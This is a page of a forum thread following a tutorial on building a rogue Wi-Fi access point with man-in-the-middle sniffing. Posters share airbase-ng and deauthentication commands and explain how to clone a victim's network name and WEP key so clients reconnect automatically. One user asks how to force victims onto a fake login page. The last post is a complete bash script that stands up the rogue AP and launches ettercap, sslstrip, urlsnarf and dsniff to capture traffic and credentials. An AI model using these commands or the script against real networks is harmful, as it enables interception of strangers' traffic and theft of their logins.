Page 2 of 8 FirstFirst 1234 ... LastLast
Results 11 to 20 of 72

Thread: Lucafa's tutorial: softAP with internet connection and MITM sniffing

  1. #11
    Developer
    Join Date
    Mar 2007
    Posts
    6,126

    Default Re: Lucafa's tutorial: softAP with internet connection and MITM sniffing

    You guys totally hijacked Lucifer's thread.

  2. #12
    Member
    Join Date
    Jan 2010
    Location
    Helsinki, Finland
    Posts
    235

    Default Re: Lucafa's tutorial: softAP with internet connection and MITM sniffing

    Quote Originally Posted by marthafocker View Post
    Nice tutorial. I'm not sure if it works yet, If it does I think I'll put into a shell script to speed up the process. How would you change the fake login page that the victim is forced to into being directed to?
    Have anyone did that - how to create fake login page and force victims to it?

  3. #13
    Just burned his ISO
    Join Date
    Apr 2010
    Posts
    5

    Cool Re: Lucafa's tutorial: softAP with internet connection and MITM sniffing

    when using airebase i use this command to setup the ap

    Code:
    sudo airbase-ng -c 11 -a (Mac address of router) -e (access point name) -z 2 -W 1 -F capture mon0
    and this to deauth them

    Code:
    sudo aireplay-ng -0 10 -a (mac of router) -c (client accesspoint) mon0
    i am a complete newb at this and i put this together myself, not sure what to do after it as im using ubuntu and am downloading bt4 for better results but i had a succesfull connection from an auto connect after using the first command to set up ap and then death to force reconnect to my ap have not got as far as trying to sniff yet

  4. #14
    Member
    Join Date
    Mar 2010
    Location
    SO CAL
    Posts
    59

    Default Re: Lucafa's tutorial: softAP with internet connection and MITM sniffing

    Hey best (HOW TO) yet I gave it 5 stars. One question though I was watching the creators of airdrop and I'm still kinda of confused on how to right the rules I'm pretty sure I'll get once I use it but a little advice never hurts.
    Stand up and be counted as a linux user.

  5. #15
    Junior Member Lucifer's Avatar
    Join Date
    Feb 2010
    Posts
    75

    Default Re: Lucafa's tutorial: softAP with internet connection and MITM sniffing

    - kherkhere; this tutorial is not for sniffing wireless encryption keys.

    - halfdone; search for g0tmi1k's bt4pre-final script, or maybe nick the greek his script. I do have to mention that both these scripts weren't working for me personally.

    - mikeyxb; get BT4Final instead of ubuntu. And if you're a 'complete newb' like you've said yourself, then start off with the very basics like in my tut, aka airbase-ng -e wifree mon0

    - enc0de; glad you like it. try airdrop-ng --help, and read through it carefully. I couldn't explain it any better.

    good luck guys
    Last edited by Lucifer; 04-09-2010 at 10:46 PM.

  6. #16
    Junior Member Lucifer's Avatar
    Join Date
    Feb 2010
    Posts
    75

    Default Re: Lucafa's tutorial: softAP with internet connection and MITM sniffing

    for those who've been messing with fake ap's, it's really important that you understand the following:

    this is an example:

    a client 'A1' is connected to his AP 'AA' with essid 'wireless' and WEP key '123456'
    if you now would deauth this client from his AP and setup a fake AP like:
    airbase-ng -e wireless -W 1 mon0
    then the client would reconnect to your fake AP since the correct essid and WEP flag is set, but the problem would be that the client is sending his packets encrypted with the key '123456' and airbase cannot decrypt since you didn't specify a key. the windows/mac client(victim) associated because the essid and encryption matches his real AP, BUUUT no communication between fake AP and client possible since you didn't specify the key airbase should use to decrypt the packets. failure.

    having said this, in this example, you would need to start airbase this way:
    airbase-ng -e wireless -w 123456 mon0

    correct essid, correct WEP key the client is using + deauth the client with airdrop from his real AP => victim instant connects to your fake ap, aka succes

    you could ofcourse, in this example, set airbase-ng -e wireless mon0 and wait for the victim to manually connect to your fake ap, but that can take ages. it's all about the windows/mac auto-reconnect function, which only cares about the essid and the encryption to reconnect, get it.

    I hope that makes some sense as this principle is fundamental for windows/mac victims.

    NOTE: this only applies to WEP clients, since it's not possible to set WPA encryption in airbase yet. for WPA clients, you can only set the correct essid in airbase and wait untill the client manually connects to your fake ap, but again, this can take ages and requires clients that are stupid.
    Last edited by Lucifer; 04-09-2010 at 11:43 PM.

  7. #17
    Just burned his ISO
    Join Date
    Apr 2010
    Posts
    5

    Default Re: Lucafa's tutorial: softAP with internet connection and MITM sniffing

    right ok i have sussed this one now but is it possible to get the client to connect to my proxy for the internet connection, i use my adb android localhost proxy on port 8080, so i will be connecting the client to my fake ap with that proxy as the internet access, would everything be the same or would it need some extra command lines somewhere in the conf file. and to use apt i have to do this command
    Code:
    export http_proxy=http://localhost:8080
    would i have to put that inplace somewher of not

  8. #18
    Just burned his ISO
    Join Date
    Mar 2010
    Posts
    5

    Default Re: Lucafa's tutorial: softAP with internet connection and MITM sniffing

    Hi Lucifer!

    I have followed you tutorial and it is almost made it through
    My issue is that when I'm done clients can connect and get`s dhcp but not Internet...

    I have checked several times that my gateway(192.168.0.1) and interfaces(eth1 & wlan0/mon0) is correct.
    Internet on the host machine(bt4) is working.

    Do you have any clues?

  9. #19
    Junior Member Lucifer's Avatar
    Join Date
    Feb 2010
    Posts
    75

    Default Re: Lucafa's tutorial: softAP with internet connection and MITM sniffing

    mikeyxb; I'm afraid this goes beyond my knowledge aswell, ask a bt guru

    ap/dc; what wireless card are you using?

    A: Make sure you've got what's NEEDED(look at the beginning of my tutorial)

    B: Try playing around with your wireless card's MTU values
    (ifconfig wlan0 MTU 1400, 1500 or 1800, and ifconfig mon0 MTU 1400, 1500, or 1800, mess around with some combinations)

    C: Maybe the MITM tools are causing you trouble. try again without them, do all the steps from 1 to 7, and leave this command out: iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000

    D: If it still doesn't work and you happen to have got a second pc/laptop, repeat all tutorial's steps on this different machine to see if it helps. I've also got some problems with fake ap's on my laptop, it only works on my older pc.

    EDIT: also play around with the at0 MTU value.

    cheers,
    Last edited by Lucifer; 04-11-2010 at 07:56 PM.

  10. #20
    Just burned his ISO l3g10n's Avatar
    Join Date
    Feb 2010
    Posts
    13

    Default Re: Lucafa's tutorial: softAP with internet connection and MITM sniffing

    #!/bin/bash #-------------- - Wifi WMITM Attack - n3n4umxc - Pastebin.com

    #----------------------------------------------------------------------#
    # This script is what I have taken from a script I found on the old BT
    # forums by Deathray. I modified it to fit my needs. -l3g10n
    #----------------------------------------------------------------------#
    echo -n "Enter the name of the interface connected to the internet, for example eth0: "
    read -e IFACE
    airmon-ng
    echo -n "Enter your wireless interface name, for example wlan0: "
    read -e WIFACE
    echo -n "Enter the ESSID you would like your rogue AP to be called, for example Free WiFi: "
    read -e ESSID
    kill `cat /var/run/dhcp3-server/dhcpd.pid`
    killall -9 dhcpd airbase-ng ettercap sslstrip driftnet urlsnarf
    airmon-ng stop $WIFACE
    ifconfig $WIFACE down
    airmon-ng start $WIFACE
    ifconfig $WIFACE up

    modprobe tun

    echo Airbase-ng is going to create our fake AP with the SSID we specified
    xterm -e airbase-ng -e "$ESSID" -P -C 30 -v mon0 &

    sleep 10

    echo Configuring interface created by airdrop-ng
    ifconfig at0 up
    ifconfig at0 10.0.0.1 netmask 255.255.255.0
    ifconfig at0 mtu 1400
    route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1

    echo 'Setting up iptables to handle traffic seen by the airdrop-ng (at0) interface'
    iptables --flush
    iptables --table nat --flush
    iptables --delete-chain
    iptables --table nat --delete-chain
    iptables -P FORWARD ACCEPT
    iptables -t nat -A POSTROUTING -o $IFACE -j MASQUERADE

    echo Creating a dhcpd.conf to assign addresses to clients that connect to us
    echo "default-lease-time 600;" > dhcpd.conf
    echo "max-lease-time 720;" >> dhcpd.conf
    echo "ddns-update-style none;" >> dhcpd.conf
    echo "authoritative;" >> dhcpd.conf
    echo "log-facility local7;" >> dhcpd.conf
    echo "subnet 10.0.0.0 netmask 255.255.255.0 {" >> dhcpd.conf
    echo "range 10.0.0.100 10.0.0.254;" >> dhcpd.conf
    echo "option routers 10.0.0.1;" >> dhcpd.conf
    echo "option domain-name-servers 8.8.8.8;" >> dhcpd.conf
    echo "}" >> dhcpd.conf

    echo 'DHCP server starting on our airdrop-ng interface (at0)'
    dhcpd3 -f -cf dhcpd.conf -pf /var/run/dhcp3-server/dhcpd.pid at0 &
    xterm -e tail -f /var/log/messages &
    #echo 'Launching ettercap, poisoning all hosts on the at0 interface's subnet'
    xterm -e ettercap -T -q -p -l ettercap$(date +%F-%H%M).log -i at0 // // &
    sleep 8

    echo 'Configuring ip forwarding'
    echo "1" > /proc/sys/net/ipv4/ip_forward

    echo 'Launching various tools'
    xterm -e sslstrip -a -k -f &
    driftnet -v -i at0 &
    xterm -e urlsnarf -i at0 &
    xterm -e dsniff -m -i at0 -d -w dsniff$(date +%F-%H%M).log &
    Last edited by l3g10n; 04-12-2010 at 12:38 AM.

Page 2 of 8 FirstFirst 1234 ... LastLast

Similar Threads

  1. Replies: 2
    Last Post: 08-23-2010, 10:53 AM
  2. rogue AP + MITM (tutorial or script request)
    By Lucifer in forum Beginners Forum
    Replies: 8
    Last Post: 04-12-2010, 12:40 AM
  3. internet connection problem?!
    By djamel in forum Beginners Forum
    Replies: 4
    Last Post: 02-27-2010, 06:08 AM
  4. Wireless Internet Connection Failing Somehow
    By shinjinkazama in forum Beginners Forum
    Replies: 1
    Last Post: 02-22-2010, 11:26 PM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •